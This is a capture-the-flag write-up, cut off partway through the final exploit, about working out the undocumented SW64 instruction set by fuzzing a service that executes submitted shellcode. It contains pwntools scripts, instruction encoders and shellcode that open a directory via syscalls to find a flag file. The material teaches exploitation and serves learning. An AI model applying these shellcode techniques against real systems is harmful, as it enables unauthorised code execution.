This was a super interesting challenge to me. If you want to follow along, the files are archived here.
At a basic level the challenge setup is that you can send shellcode for an “unknown” architecture, namely SW64, to a remote service that will execute it and return a single value.
The Challenge Setup
Starting out on any challenge really, the first thing I do is read the description.
So here it is:
Due to the special background of the R&D unit of Sunway CPU, the SW64 instruction set has not been made public so far. Although non-disclosure of the instruction set is very detrimental to the construction of the software ecosystem, it also prevents malicious attackers from writing shellcode targeting Sunway processors, and the product has extremely high self-security. [1] 🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣 Surely writing shellcode for an ""unknown"" architecture is impossible, right, right??? Note: Flag located at /flag_(a random uuid), there is no /bin/sh. [1] Machine translated, source: https://k-sina-cn.translate.goog/article_5952916295_162d24b47019001k3l.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=zh-CN&_x_tr_pto=wapp'
This sounded super interesting to me, so this was the first challenge I decided to work on during the CTF.
challenge.c
So I downloaded the files and unpacked them. The only file you got for the challenge was challenge.c.
I’ve linked the original above, but I will only go over the parts I think are relevant.
int main(int argc, char *argv[]) {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
PrintCurrentArch();
void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (page == MAP_FAILED) {
puts("mmap failed?");
return 1;
}
printf("Give me a shellcode to compute A+B, size (0 to use the builtin): ");
For now let’s just believe the challenge author that functions do what their name suggests.
The challenge first prints the current architecture, then maps one page of memory read/write and then prompts the user for “shellcode to compute A+B“. So far so good.
The interesting nugget for me was that if I pass size 0 it will use some builtin shellcode.
Let’s quickly verify that the challenge does what we expect. I am running the challenge container locally with:
docker run -p 5000:5000 --privileged potluck-ctf-challenge-12
So let’s just netcat to port 5000 and send 0.
[firzen@archlinux shell_no_evil]$ nc 127.0.0.1 5000 Challenge running on sw64 Give me a shellcode to compute A+B, size (0 to use the builtin): 0 1 + 2 = 3
Everything as expected. This may seem pointless or banal, but I find that especially with compact challenges it’s a good idea to verify your assumptions as often as possible. I tripped over not doing it consistently enough quite a few times while solving this challenge.
Let’s read more challenge code.
size_t size = 0;
scanf("%zu", &size);
if (size > 4096) {
puts("too big! ❤️");
return 1;
}
if (size) {
printf("ok, give me %zu bytes of shellcode: ", size);
if (ReadN(0, page, size) != size) {
return 1;
}
} else {
memcpy(page, kBuiltinShellcode, sizeof(kBuiltinShellcode));
}
The code reads the size of our input, performs a bounds check and then has special handling for if 0 is passed in. Namely it copies kBuiltinShellcode into the page that was mapped earlier.
Otherwise it will read our input (if the function name is to be believed).
Let’s read the final bit of the challenge code.
if (mprotect(page, 4096, PROT_READ | PROT_EXEC) != 0) {
puts("mprotect failed??");
return 1;
}
int a = 1;
int b = 2;
int (*a_plus_b)(int, int) = page;
printf("%d + %d = %d\n", a, b, a_plus_b(a, b));
return 0;
}
In line 56 the page that the shellcode was written to is made executable.
In line 63 the address of page is cast to a function pointer to a function that takes 2 int arguments and returns an int.
Finally in line 64 the result of the “”addition”” is printed and actually calculated by calling the function in page.
So it looks like the challenge really does what it says on the tin. It will execute whichever bytes we pass it and print the result for us.
Now if you’ve been paying attention you probably really want to know what kBuiltinShellcode actually is.
kBuiltinShellcode
unsigned char kBuiltinShellcode[] = {
0x00, 0x00, 0x11, 0x42, 0x01, 0x00, 0xfa, 0x0b,
};
And that’s it in all it’s glory. 8 bytes to add two numbers (apparently). If you’re like me at this stage, you’ll have no clue what those bytes actually mean. But we can talk to the service, so let’s just do a sanity check for now.
If we submit the same bytes as the builtin shellcode we should see the same result.
from pwn import *
kBuiltinShellcode = b"\x00\x00\x11\x42\x01\x00\xfa\x0b"
r = remote("localhost", 5000)
r.recvuntil(b"(0 to use the builtin): ")
r.sendline(f"{len(kBuiltinShellcode)}".encode())
r.recvuntil(b"bytes of shellcode: ")
r.send(kBuiltinShellcode)
print(r.clean(timeout=0.5))
The code is pretty self-explanatory.
We have some bytes representing the builtin shellcode and then we send its length and the shellcode itself and print the result.
[firzen@archlinux blog]$ python3 sanity.py [+] Opening connection to localhost on port 5000: Done b'1 + 2 = 3\n' [*] Closed connection to localhost port 5000
and it behaves exactly like expected. So it seems like there aren’t any weird tricks going on with the challenge, seems like it does what it says on the tin.
At this stage I started to just mess with the bytes in the builtin shellcode, I’ll give one example and then I’ll skip ahead.
kBuiltinShellcode = b"\x00\x00\x10\x42\x01\x00\xfa\x0b"
The only change here is that the third byte is 0x10 instead of 0x11.
[firzen@archlinux blog]$ python3 modified1.py [+] Opening connection to localhost on port 5000: Done b'1 + 2 = 2\n' [*] Closed connection to localhost port 5000
It’s nice to see that the result changed, so it actually matters what we send over.
To not do all of this manually I modified my script a little bit, so that I could quickly check all modified bytes and after some poking around I found something interesting.
Entry Point
Here’s something similar to the script I was using.
from pwn import *
context.log_level = "error" #get rid of annoying connect disconnect prints
kBuiltinShellcode = b"\x00\x00\x11\x42\x01\x00\xfa\x0b"
def attempt(shellcode):
with remote("localhost", 5000) as r:
r.recvuntil(b"(0 to use the builtin): ")
r.sendline(f"{len(shellcode)}".encode())
r.recvuntil(b"bytes of shellcode: ")
r.send(shellcode)
return r.clean(timeout=0.5)
if __name__ == "__main__":
for i in range(256):
print(hex(i))
sc = kBuiltinShellcode[0:3]+bytes([i])+kBuiltinShellcode[4:8]
print(attempt(sc).decode())
First, I’ve wrapped attempting whatever shellcode I want to try into a function.
Second, I’m replacing the 4th byte in the payload with all values between 0 and 255, just to see what happens. So here’s what that looks like at first.
[firzen@archlinux blog]$ python3 modified2.py 0x0 UNDO sys_call 110000 0x1 UNDO sys_call 1110000 0x2 UNDO sys_call 110000 0x3 UNDO sys_call 1110000 0x4 0x5 0x6 0x7 0x8 0x9
Some weird error messages (they still don’t really make sense to me). And empty responses, maybe we hung or crashed the process, I’m not sure, at the very least those take the longest to run.
Then starting from 0x40 we get relatively normal looking results. Especially 0x42 behaves as expected, since it’s the original byte from kBuiltinShellcode.
0x40 1 + 2 = 2 0x41 1 + 2 = 5 0x42 1 + 2 = 3 0x43 1 + 2 = -751071051 0x44 1 + 2 = 2
But at 0x74 something very interesting happens.
0x74 here 4000a1c004 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c004 SP=0000004000801d50 v0=0000000000000000 t0=0000000120011328 t1=000000000010f000 t2=0000004000842000 t3=0000000000000003 t4=0000000000000000 t5=0000000000000000 t6=0000000000000002 t7=0000000000000003 s0=0000004000a1c000 s1=0000000000000000 s2=0000000000000000 s3=0000000000000000 s4=0000000000000000 s5=0000000000000000 fp=0000000000000000 a0=0000000000000001 a1=0000000000000002 a2=0000000000000005 a3=0000000000000000 a4=0000004000a172e8 a5=0000000000000000 t8=000000000000052a t9=0000004000801b30 t10=00000000d33b90b3 t11=0000004000801a98 ra=0000000120000950 t12=0000004000a1c000 at=00000000d33b8e9b gp=0000000120019408 sp=0000004000801d50 f0=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f1=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f2=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f3=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f4=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f5=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f6=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f7=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f8=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f9=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f10=657375206f742030 2820657a6973202c 422b412065747570 6d6f63206f742065 f11=a49de22021676962 206f6f7400757a25 00203a296e69746c 6975622065687420 f12=0000000000000000 0000000000000000 e22021676962206f 6f7400757a250020 f13=e22021676962206f 6f7400757a250020 3a296e69746c6975 6220656874200000 f14=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f15=0000000000000000 0000000000000000 0000000000000000 0000001e00000000 f16=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f17=0000000000000000 0000000000000000 0000000000000000 0000000200000000 f18=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f19=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f20=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f21=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f22=2f7273752f363139 392d62362d657669 74616e2d30313763 636777732f77732f f23=2f7273752f363139 392d62362d657669 74616e2d30310000 0000000000000000 f24=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f25=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f26=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f27=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f28=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f29=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f30=0000000000000000 0000000000000000 0000000000000000 0000000000000000 f31=0000000000000000 0000000000000000 0000000000000000 0000000000000000 qemu-sw64: /b/include/qemu/rcu.h:101: rcu_read_unlock: Assertion `p_rcu_reader->depth != 0' failed.
We seem to have crashed qemu-sw64 and not just that, it helpfully dumps all registers for us.
During the CTF this actually sent me down a rabbit hole trying to find this build of qemu. In this blog post I’ll continue down the path I ultimately went to solve the challenge though.
Registers
Looking at the dump of registers above we can make some (more or less) educated guesses about the architecture. I’ll also exclude the f registers, they are likely floating point registers and I have no desire to deal with that.
here 4000a1c004 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c004 SP=0000004000801d50 v0=0000000000000000 t0=0000000120011328 t1=000000000010f000 t2=0000004000842000 t3=0000000000000003 t4=0000000000000000 t5=0000000000000000 t6=0000000000000002 t7=0000000000000003 s0=0000004000a1c000 s1=0000000000000000 s2=0000000000000000 s3=0000000000000000 s4=0000000000000000 s5=0000000000000000 fp=0000000000000000 a0=0000000000000001 a1=0000000000000002 a2=0000000000000005 a3=0000000000000000 a4=0000004000a172e8 a5=0000000000000000 t8=000000000000052a t9=0000004000801b30 t10=00000000d33b90b3 t11=0000004000801a98 ra=0000000120000950 t12=0000004000a1c000 at=00000000d33b8e9b gp=0000000120019408 sp=0000004000801d50
Here are my guesses/hypotheses I took from these registers and their names.
- PC probably the program counter, especially since it’s the same value as the here in the qemu crash message
- SP probably the stack pointer
- RA possibly the return address? Similar to a link register maybe.
- A0-A5 probably arguments being passed. a0 is 1 and a1 is 2, exactly the arguments passed to our addition function. A2 is 5 which is also the value of PROT_READ | PROT_EXEC.
- T3 and T7 are 3, but we didn’t add anything in this payload, so keep that in mind.
- Registers all seem to be 64 bit wide.
So this already gives us a decent idea about the architecture, as well as a part of the ABI.
Next let’s modify the original shellcode again to crash after the addition.
from pwn import *
kBuiltinShellcode = b"\x00\x00\x11\x42\x00\x00\x11\x74"
r = remote("localhost", 5000)
r.recvuntil(b"(0 to use the builtin): ")
r.sendline(f"{len(kBuiltinShellcode)}".encode())
r.recvuntil(b"bytes of shellcode: ")
r.send(kBuiltinShellcode)
print(r.clean(timeout=0.5).decode())
[firzen@archlinux blog]$ python3 modified3.py [+] Opening connection to localhost on port 5000: Done here 4000a1c008 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c008 SP=0000004000801d50 v0=0000000000000003 t0=0000000120011328 t1=000000000010f000 t2=0000004000842000 [snip]
Crashing after the addition shows us that v0 has become 3, the result of our operation. So v0 likely contains the return value in the ABI.
Enumerating Registers
At this point I wanted to work out how to target specific registers, so I modified the script that found the crash a little bit.
from pwn import *
context.log_level = "error" #get rid of annoying connect disconnect prints
crashing_code = b"\x00\x00\x11\x42\x00\x00\x11\x74"
def attempt(shellcode):
with remote("localhost", 5000) as r:
r.recvuntil(b"(0 to use the builtin): ")
r.sendline(f"{len(shellcode)}".encode())
r.recvuntil(b"bytes of shellcode: ")
r.send(shellcode)
return r.clean(timeout=0.5)
if __name__ == "__main__":
for i in range(256):
print(hex(i))
sc = bytes([i])+crashing_code[1:8]
print(attempt(sc).decode())
Now we’re intending to always crash, but we are replacing the first byte with the numbers 0 through 255.
I will be snipping out a LOT of output.
[firzen@archlinux blog]$ python3 modified4.py 0x0 here 4000a1c008 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c008 SP=0000004000801d50 v0=0000000000000003 t0=0000000120011328 t1=000000000010f000 t2=0000004000842000 [snip] 0x1 here 4000a1c008 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c008 SP=0000004000801d50 v0=0000000000000000 t0=0000000000000003 t1=000000000010f000 t2=0000004000842000 [snip] 0x2 here 4000a1c008 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c008 SP=0000004000801d50 v0=0000000000000000 t0=0000000120011328 t1=0000000000000003 t2=0000004000842000 [snip] 0x3 here 4000a1c008 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c008 SP=0000004000801d50 v0=0000000000000000 t0=0000000120011328 t1=000000000010f000 t2=0000000000000003 [big snip] 0x1e here 4000a1c008 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c008 SP=0000000000000003 v0=0000000000000000 t0=0000000120011328 t1=000000000010f000 t2=0000004000842000 t3=0000000000000003 t4=0000000000000000 t5=0000000000000000 t6=0000000000000002 t7=0000000000000003 s0=0000004000a1c000 s1=0000000000000000 s2=0000000000000000 s3=0000000000000000 s4=0000000000000000 s5=0000000000000000 fp=0000000000000000 a0=0000000000000001 a1=0000000000000002 a2=0000000000000005 a3=0000000000000000 a4=0000004000a172e8 a5=0000000000000000 t8=000000000000052a t9=0000004000801b30 t10=00000000d33b90b3 t11=0000004000801a98 ra=0000000120000950 t12=0000004000a1c000 at=00000000d33b8e9b gp=0000000120019408 sp=0000000000000003 [snip] 0x20 here 4000a1c008 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c008 SP=0000004000801d50 v0=ffffffffffffffff t0=0000000120011328 t1=000000000010f000 t2=0000004000842000
You’ve probably spotted the pattern already. The first byte seems to just be the index of the target register. You can very clearly see that all the way up to 0x1e we always write 3 to the corresponding register in the list. (At 0x1f nothing happens, it’s a special read 0, write ignore register).
But when we wrap around to 0x20, something interesting happens. We change v0 again, but not to 3 as expected. We somehow changed the result of the operation. More on that in a little bit.
For the moment the takeaway is that we can access any of the 31 general purpose registers.
That it wraps around after 32 means that the registers are likely encoded as 5 bit.
Let’s see if we can also work out how the other registers are encoded.
To do this we mask 5 bits in the addition instruction and replace them with the index of t0, since it has a recognizable value. Here is the code:
from pwn import *
context.log_level = "error" #get rid of annoying connect disconnect prints
add_code = b"\x00\x00\x11\x42"
crashing_code = b"\x00\x00\x11\x74"
def attempt(shellcode):
with remote("localhost", 5000) as r:
r.recvuntil(b"(0 to use the builtin): ")
r.sendline(f"{len(shellcode)}".encode())
r.recvuntil(b"bytes of shellcode: ")
r.send(shellcode)
return r.clean(timeout=0.5)
if __name__ == "__main__":
for i in range(27):
print(hex(i))
r_idx = 1
add_val = u32(add_code) #turn add instruction into number
add_val &= ~(0x1f << i) #mask 5 bits
add_val |= r_idx << i #or with 1 to set bit again
sc = p32(add_val) + crashing_code # modified addition + crash
print(attempt(sc).decode())
Going through the results here are the interesting excerpts:
0x0 here 4000a1c008 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c008 SP=0000004000801d50 v0=0000000000000000 t0=0000000000000003 t1=000000000010f000 t2=0000004000842000 0x10 here 4000a1c008 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c008 SP=0000004000801d50 v0=0000000020011329 t0=0000000120011328 t1=000000000010f000 t2=0000004000842000 [snip] 0x15 here 4000a1c008 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c008 SP=0000004000801d50 v0=000000002001132a t0=0000000120011328 t1=000000000010f000 t2=0000004000842000
This behaviour is (almost) exactly as expected.
Our original instruction amounts to v0=a0+a1 or v0=a1+a0, we can’t really distinguish these because addition is commutative.
In the 0x0 case we’ve replaced the target register, so now t0 has become 3, since our new instruction amounts to t0=a0+a1.
In the 0x10 case we’ve replaced a1, so we get v0=t0+a0=t0+1.
In the 0x15 case we’ve replaced a0, so we get v0=t0+a1=t0+2.
So this tells us how to perform 32-bit addition using different registers.
Now why do I say 32 bit? You may have noticed that the value of t0 has been truncated. So at this point I’m assuming that we are performing 32 bit addition.
Addition
With our new-found knowledge, let’s try and see if we can break down the encoding of our instruction.
0-4 5-15 16-20 21-25 26-31 00000 00000000000 00000 00000 000000 dst ??????????? src1 src2 ?????? 0x42110000 0 0 0 0 1 1 2 4 00000 00000000000 10001 00001 000010
Decoding the original addition instruction manually we get out that
dst=0=v0
src1=17=a1
src2=16=a0
These perfectly line up with the registers from the crash dumps above.
This means that bits 5-15 and 26-31 somehow encode our addition operation.
Let’s perform a sanity check first and add some interesting values together assuming our encoding works.
from pwn import *
context.log_level = "error" #get rid of annoying connect disconnect prints
add_code = b"\x00\x00\x11\x42"
crashing_code = b"\x00\x00\x11\x74"
def attempt(shellcode):
with remote("localhost", 5000) as r:
r.recvuntil(b"(0 to use the builtin): ")
r.sendline(f"{len(shellcode)}".encode())
r.recvuntil(b"bytes of shellcode: ")
r.send(shellcode)
return r.clean(timeout=0.5)
def add(dst, r1,r2):
add_val = 0x40000000 #decoded and masked value that means 32-bit add
#or registers into instruction
add_val |= dst
add_val |= r1 << 0x10
add_val |= r2 << 0x15
return p32(add_val) #encode
if __name__ == "__main__":
add_val = add(21,22,23) #add: a5=t8+t9
sc = add_val + crashing_code # modified addition + crash
print(attempt(sc).decode())
here 4000a1c008 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c008 SP=0000004000801d50 v0=0000000000000000 t0=0000000120011328 t1=000000000010f000 t2=0000004000842000 t3=0000000000000003 t4=0000000000000000 t5=0000000000000000 t6=0000000000000002 t7=0000000000000003 s0=0000004000a1c000 s1=0000000000000000 s2=0000000000000000 s3=0000000000000000 s4=0000000000000000 s5=0000000000000000 fp=0000000000000000 a0=0000000000000001 a1=0000000000000002 a2=0000000000000005 a3=0000000000000000 a4=0000004000a172e8 a5=000000000080205a t8=000000000000052a t9=0000004000801b30 t10=00000000d33b90b3 t11=0000004000801a98 ra=0000000120000950 t12=0000004000a1c000 at=00000000d33b8e9b gp=0000000120019408 sp=0000004000801d50
Looks like it works exactly as expected.
Arithmetic
From here we can experiment to see if we can find other operations that seem useful. Let’s start by modifying that string of 10 0 bits in the original addition instruction. That’s 1024 possible values, so I won’t put all of them down, you’re welcome to run the script yourself, I recommend piping the output into a file.
from pwn import *
context.log_level = "error" #get rid of annoying connect disconnect prints
add_code = b"\x00\x00\x11\x42"
crashing_code = b"\x00\x00\x11\x74"
def attempt(shellcode):
with remote("localhost", 5000) as r:
r.recvuntil(b"(0 to use the builtin): ")
r.sendline(f"{len(shellcode)}".encode())
r.recvuntil(b"bytes of shellcode: ")
r.send(shellcode)
return r.clean(timeout=0.5)
def add(dst,r1,r2, mod):
add_val = 0x40000000 #decoded and masked value that means 32-bit add
#or registers into instruction
add_val |= dst
add_val |= mod << 0x5 #Modify the 10 zero bits of the 32bit addition
add_val |= r1 << 0x10
add_val |= r2 << 0x15
return p32(add_val) #encode
if __name__ == "__main__":
for i in range(1024):
print(hex(i))
add_val = add(21,22,23, i) #add: a5=t8+t9
sc = add_val + crashing_code # modified addition + crash
print(attempt(sc).decode())
0x0 32 bit addition a4=0000004000a172e8 a5=000000000080205a t8=000000000000052a t9=0000004000801b30 0x1 32 bit subtraction a4=0000004000a172e8 a5=0000000000801606 t8=000000000000052a t9=0000004000801b30 0x8 64 bit addition a4=0000004000a172e8 a5=000000400080205a t8=000000000000052a t9=0000004000801b30 0x9 64 bit subtraction a4=0000004000a172e8 a5=0000004000801606 t8=000000000000052a t9=0000004000801b30
There are a lot of other interesting operations in there, but I just wanted to illustrate the basic principle.
At this point I assumed that the 10 bits encode the arithmetic operation. That means that the last 6 bits likely encode the type of the operation.
Intermediate Recap
At this point let’s recap.
We are able to dump all registers.
We are able to encode basic arithmetic between registers.
During the CTF, I started to wrap the instructions I knew how to encode into a little helper script.
At this stage it contained mov (add dst, src, zero), add and sub. I was only using the 64 bit versions.
But if we want to be able to read the flag we definitely need a bit more.
Namely, we don’t know how to read or write memory yet and we have no idea how to issue a syscall.
Accessing Memory
Figuring out how to access memory was a bit tricky at first.
Specifically, how would I know that the value in a register comes from memory and not some arithmetic or other operation? If I knew how to access the pc register it might be easier, but unfortunately pc isn’t one of the 32 general purpose registers I know how to encode.
After trying around for a while I noticed something very useful though. I’ll highlight it in the excerpt below:
0x0 here 4000a1c008 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c008 SP=0000004000801d50 v0=0000000000000000 t0=0000000120011328 t1=000000000010f000 t2=0000004000842000 t3=0000000000000003 t4=0000000000000000 t5=0000000000000000 t6=0000000000000002 t7=0000000000000003 s0=0000004000a1c000 s1=0000000000000000 s2=0000000000000000 s3=0000000000000000 s4=0000000000000000 s5=0000000000000000 fp=0000000000000000 a0=0000000000000001 a1=0000000000000002 a2=0000000000000005 a3=0000000000000000 a4=0000004000a172e8 a5=000000000080205a t8=000000000000052a t9=0000004000801b30 t10=00000000d33b90b3 t11=0000004000801a98 ra=0000000120000950 t12=0000004000a1c000
Register t12 is VERY close to PC. In fact I’m confident that t12 points to the page our shellcode is read into.
So if I add a bunch of known data I can verify that I am reading memory as expected.
The plan is this:
- Add some value to t12, in this case t8 is a good candidate.
- Try out all variants of the top 6 bits, with all registers set to t12.
- Fill the rest of the shellcode with As
- If we see 0x41414141 we have likely found a read.
from pwn import *
from sw64 import add, t12, t8
context.log_level = "error" #get rid of annoying connect disconnect prints
add_code = b"\x00\x00\x11\x42"
crashing_code = b"\x00\x00\x11\x74"
def attempt(shellcode):
with remote("localhost", 5000) as r:
r.recvuntil(b"(0 to use the builtin): ")
r.sendline(f"{len(shellcode)}".encode())
r.recvuntil(b"bytes of shellcode: ")
r.send(shellcode)
return r.clean(timeout=0.5)
def op(dst,r1,r2, mod):
op_val = 0x00000000
op_val |= dst
op_val |= mod << 0x1a #Modify the op code
op_val |= r1 << 0x10
op_val |= r2 << 0x15
return p32(op_val) #encode
if __name__ == "__main__":
for i in range(64):
print(hex(i))
payload = add(t12,t12,t8) #Add some offset to t12 so we're in the middle of the page
payload += op(t12,t12,t12,i) #Try out our operation
payload += crashing_code #Crash so we can read registers
payload += b"A"*(4096-len(payload)) #Fill with As
print(attempt(payload).decode())
Here’s the code to put this plan into action.
Line 2 imports my little support library, this let’s me add and use registers by name to make the process more comfortable.
Line 18 is the one that modifies the op code to let us try out different ones.
Line 26-29 construct the payload, it’s starting to look similar to assembly.
0x23 [snip] t10=00000000d33b90b3 t11=0000004000801a98 ra=0000000120000950 t12=4141414141414141
And op 0x23 seems to do what we want. It loads 8 bytes from memory.
I’ll skip the details of how I worked out which bits specify src and dst in the encoding. There were only a few combinations and I manually tried them out. In the end, I arrived at this nice little helper (you can tell it’s just slightly adapted from the enumeration script):
def ldq(dst,src_reg):
op_val = 0x00000000
op_val |= dst << 0x15
op_val |= src_reg << 0x10
op_val |= 0x23 << 0x1a #Modify the op code
return p32(op_val) #encode
Since we can now load values from memory, we can repeat this process and verify if we have written to memory somewhere. It’s basically the same as we did for the load, except we first try to store and then load from the location we tried to store at to check if something changed.
One thing to note is that we can’t use t12 again, because the memory is read-only when our code runs.
But happily our assumed stack pointer sp probably points to writable memory.
So here’s the test:
from pwn import *
from sw64 import add, t12, t8, sp, v0
context.log_level = "error" #get rid of annoying connect disconnect prints
add_code = b"\x00\x00\x11\x42"
crashing_code = b"\x00\x00\x11\x74"
def attempt(shellcode):
with remote("localhost", 5000) as r:
r.recvuntil(b"(0 to use the builtin): ")
r.sendline(f"{len(shellcode)}".encode())
r.recvuntil(b"bytes of shellcode: ")
r.send(shellcode)
return r.clean(timeout=0.5)
def load(dst,src_reg):
op_val = 0x00000000
op_val |= dst << 0x15
op_val |= src_reg << 0x10
op_val |= 0x23 << 0x1a #Modify the op code
return p32(op_val) #encode
def op(dst,src_reg, mod):
op_val = 0x00000000
op_val |= dst << 0x15
op_val |= src_reg << 0x10
op_val |= mod << 0x1a #Modify the op code
return p32(op_val) #encode
if __name__ == "__main__":
for i in range(64):
print(hex(i))
payload = op(t12,sp,i) #Try out our operation, to write to [sp]
payload += load(v0, sp) #Load from sp into v0
payload += crashing_code #Crash so we can read registers
payload += b"A"*(4096-len(payload)) #Fill with As
print(attempt(payload).decode())
In line 26 we’re doing the same modification as before, except that we’re assuming that load and store operations will be encoded in a similar way.
Then our payload in lines 32 to 34 will attempt to write the value of t12 at address sp and load that value back into v0.
Again I’ll only put an excerpt of the results here, but it should be pretty clear:
0x2b here 4000a1c00c qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c00c SP=0000004000801d50 v0=0000004000a1c000 t0=0000000120011328 t1=000000000010f000 t2=0000004000842000 [snip] t10=00000000d33b90b3 t11=0000004000801a98 ra=0000000120000950 t12=0000004000a1c000
So with 0x2b we’ve transfered the value of t12 to v0, by first writing it to memory and then reading it back out.
So at this point we can also load and store memory.
I will skip a little bit here, where I discovered that I can also encode an offset into the memory access. This works essentially the same way as it does on ALPHA.
Syscalls
At this point all that’s missing is figuring out how to issue syscalls and the corresponding numbers.
This could have been a total pain in the butt, but luckily at least in this regard SW64 is VERY similar to ALPHA.
During the whole endeavour I was googling for things and getting stuck in a bunch of rabbit holes. But among a lot of useless information I also learned that SW64 is based off of, or at least similar to ALPHA.
So I looked up how syscalls work on linux in the ALPHA architecture here.
LEAF(__syscall, 0)
mov a0, v0 /* Syscall number -> v0 */
mov a1, a0 /* arg1-arg5 -> a0-a4 */
mov a2, a1
mov a3, a2
mov a4, a3
mov a5, a4
call_pal PAL_callsys /* Invoke system call */
bne a3, error
ret
Lines 2 and 3 tell us the calling convention.
I had to read up a bit to find out what the PAL_callsys constant on line 7 is, but found it here for example.
Luckily the call_pal instruction seems to be encoded the same way as it is on ALPHA, so I didn’t need to do any enumeration there.
So this is what a syscall looks like in my helper script:
op_call_pal = 0
pal_callsys = 0x83
def pal(_pal):
inst = (op_call_pal&0x3f)<<26
inst |= _pal&0x1ffffff
return p32(inst)
#v0 syscall num
#a0-a5 args
def syscall_0():
return pal(pal_callsys)
Nothing super interesting in that code.
The main issue left is how to easily load data into registers, since we haven’t found a way to load immediate values. But since we know the start of our page in memory is in register t12, we can just include all our data in the payload and perform relative loads from t12.
Let’s try to open a file this way.
Helpfully there’s a table of syscalls that includes the ALPHA architecture.
So we know that open corresponds to syscall_no 45.
I’ve heavily commented the following test, so I hope it’s easy to follow.
from pwn import *
from sw64 import *
context.log_level = "error" #get rid of annoying connect disconnect prints
crashing_code = b"\x00\x00\x11\x74"
def attempt(shellcode):
with remote("localhost", 5000) as r:
r.recvuntil(b"(0 to use the builtin): ")
r.sendline(f"{len(shellcode)}".encode())
r.recvuntil(b"bytes of shellcode: ")
r.send(shellcode)
return r.clean(timeout=0.5)
if __name__ == "__main__":
data_offset = 0x100
# Code
payload = ldq(v0, t12, data_offset) # load syscall no for open into v0
payload += ldq(a0, t12, data_offset+0x8) # load offset to string "/" into a0
payload += add(a0, t12, a0) # add start of our memory page to turn offset into address
payload += mov(a1, zero_reg) # set a1 to 0, this corresponds to opening the file read only
payload += syscall_0() # issue syscall
payload += crashing_code #Crash so we can read registers
# Padding
payload += b"\x00"*(data_offset-len(payload)) # pad to data_offset length
# Data
payload += p64(45) # syscall_open
payload += b"/\0\0\0" # "/"
print(attempt(payload).decode())
I arbitrarily decided to put the data 0x100 after the start of the code. This could have been any offset as long as both code and data fit into the 4096 bytes of space that we have.
We fill the registers as appropriate for the syscall and then trigger it. Immediately afterwards we crash, so that we can examine the result.
here 4000a1c018 qemu: fatal: ILLEGAL SW64 insn at line 42! PC=0000004000a1c018 SP=0000004000801d50 v0=0000000000000002 t0=0000000120011328 t1=000000000010f000 t2=0000004000842000
v0 = 2
So it looks like we’ve opened a new file descriptor. And that’s basically it.
With the ability to issue system calls we now have the last piece of the puzzle.
The Full Exploit
I feel like the interesting bit of this challenge was working out the instruction set.
Writing the exploit after having basic assembly functionality was relatively trivial by comparison.
I will briefly go over the actual exploit I ended up using during the CTF, so it’s structure is a little different from the small demo scripts I made for this blog post.
I will go over each section of the exploit individually, listing both the relevant code and data sections separately. (Mainly so line numbers work)
Here is a link to the entirety.
from pwn import *
from sw64 import *
break_code = bytes([0x00,0x00,0x10,125])
def send_payload(p, payload):
p.recvuntil(b"(0 to use the builtin):")
p.sendline(str(len(payload)).encode())
p.recvuntil(b"of shellcode: ", timeout=1)
p.send(payload)
return p.clean(timeout=1).decode()
def attempt(payload):
with remote("localhost", 5000) as p:
return send_payload(p, payload)
syscall_no_open = 45
syscall_no_getdents = 305
syscall_no_read = 3
if __name__ == "__main__":
data_offset = 0x100
payload = b""
#Open /
payload += ldq(v0, s0, data_offset) #syscall_open
payload += ldq(a0, s0, data_offset+0x8)
payload += mov(a1, zero_reg)
payload += add(a0, s0, a0)
payload += syscall_0()
payload += b"\x00"*(data_offset-len(payload))
#data
payload += p64(syscall_no_open)
payload += p64(0x118) #string offset #0x8
payload += p64(0x0) #open flags #0x10
payload += b"/"+b"\x00"*7 #0x18
The payload starts out basically the same as our open test. Nothing more to explain here.
The only small note is that I am making all entries in the data segment multiples of 8 large.
After this part of the payload we should have an open file descriptor for the root directory in v0.
# Dirent
payload += mov(a0, v0)
payload += mov(a1, sp)
payload += ldq(a2, t12, data_offset+0x28)
payload += ldq(v0, t12, data_offset+0x20) #syscall_get_dents
payload += syscall_0()
payload += p64(syscall_no_getdents)#0x20
payload += p64(200) #0x28
